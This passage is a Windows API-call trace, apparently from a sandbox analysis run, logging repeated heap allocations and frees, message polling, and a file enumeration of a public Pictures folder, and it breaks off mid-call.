hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.062] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0268.063] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0268.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.063] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0268.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.064] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0268.064] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.064] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.065] FreeLibrary (hLibModule=0x74d40000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.065] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.065] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0268.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.065] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0268.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0268.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0268.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.066] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.067] CloseHandle (hObject=0x2c8) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0268.068] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0268.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0268.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0268.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0268.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0268.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0268.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0268.072] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0268.073] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/Sample Pictures", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x8bedfc*="Sample Pictures") returned 0x28 [0268.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249a7e0 | out: hHeap=0x25c0000) returned 1 [0268.073] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures" (normalized: "c:\\users\\public\\pictures\\sample pictures")) returned 0x11 [0268.073] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName=".", cAlternateFileName="")) returned 0xaa5660 [0268.089] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="..", cAlternateFileName="")) returned 1 [0268.089] FindNextFileW (in: 